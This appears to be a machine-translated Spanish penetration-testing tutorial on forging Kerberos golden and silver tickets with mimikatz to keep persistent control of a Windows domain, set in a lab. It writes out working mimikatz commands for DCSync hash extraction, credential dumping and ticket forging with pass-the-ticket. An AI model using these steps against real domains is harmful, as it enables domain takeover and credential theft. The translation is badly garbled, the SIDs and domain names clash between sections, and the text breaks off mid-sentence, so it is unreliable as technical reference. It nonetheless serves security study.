Aviso: Este artículo describe la tecnología es para los profesionales de la seguridad de la red y el uso de sombrero blanco, cualquier individuo u organización no debe difundir el uso de las tecnologías y herramientas en actos criminales, una vez descubierto presentadas directamente a las agencias de seguridad nacional para hacer frente a
El permiso para mantener
las notas de oro
principio de la vulnerabilidad Ms14068 se forjó TGT tubo de dominio y la vulnerabilidad del principio de la factura es de dominio de usuario proyecto de ley, krbtgt falsificación de oro krbtgt de usuario se utiliza para gestionar el control de usuario en la emisión de billetes, con el permiso del usuario, puede sistema de falsa cualquier usuario
- Condiciones requisitos de billetes de oro:
-
1. Nombre de Dominio hacker.com
2. dominio de valores SID-1-5-21-1854149318-4101476522-1845767379 S
KRBTGT cuenta NTLM hashes de contraseñas 3. dominio o AES-256 Valor
0028977ae726d766b150520dc63df9b4
4. falso nombre de usuario Administrador
NTLM hashes extracción de usuario de dominio krbtgt
lsadump::dcsync /domain:hacker.com /user:krbtgt
usuario administrador falsificación
kerberos::golden /admin:administrator /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /krbtgt:ce420fcea94d02d7051ebfb82833edf7 /ptt
notas de plata
Plata y oro ms14068 facturas con los principios de la ley no son los mismos, ms14068 y oro notas son TGT falsificación (billetes billete emitido), mientras que la factura de plata es la falsificación st (billetes), este beneficio no es el billete después de KDC, y por lo tanto más entradas ocultas, pero forjados únicamente por parte de los trabajos de mantenimiento, tales como CIFS (servicio de intercambio de archivos), mssql, WinRM (Administración remota de windows), DNS, etc.
- requisitos notas condiciones plata
-
1. Dominio
hacker.com
2. SID del dominio
S-1-5-21-1854149318-4101476522-1845767379
servidor 3. objetivo el FQDN
dc.hacker.com
4. Servicios disponibles
CIFS
5. El servicio cuenta la HASH NTML
52c74fc45feba971209be6f2bc068814
. 6. necesidad falso nombre de usuario de
prueba
Obtener dominio de hash máquina controlador
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txt
billetes falsos de plata
kerberos::golden /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /target:dc.hacker.com /service:cifs /rc4:031091bab05b768b471a7060b6d1bbf1 /user:test /ptt
entorno experimental:
- Windows Server 2012 R2 x64 (la máquina controlador de dominio)
- Windows 7 SP1 x64 (máquina de usuario de dominio)
- pfSense (enrutamiento)
ms14068
Por favor referirse al método específico para la construcción de entorno de dominio controlado dentro de la empresa para construir una red de 30.000 palabras, un tutorial de implementación detallado
simulación:
billetes falsos de oro
La recopilación de información
ipconfig /all
Obtener un nombre de dominio
whoami /all
para obtener el SID
utilizando el software mimikatz para obtener NTLM hashes de contraseñas de usuario KRBTGT
de entrada klist purge
a las entradas de borrado
billete falso
Sustituirá a la información recopilada para realizar un boleto uso de software falsificado usuario administrador declaraciones mimikatz y salga
conseguido con éxito el controlador de dominio
para borrar la cuenta y el acceso denegado
billetes falsos de plata
La recopilación de información
ipconfig /all
Obtener ip controlador de dominio
de entrada ping -a 10.1.1.1
para obtener el nombre de dominio completo dc.kacker.com
whoami /all
para obtener el SID
de exportación el hash máquina de controlador de dominio
billete falso
La información recopilada se utiliza para reemplazar billete de software falsificado de la sentencia de ejecución mimikatz, se puede visitar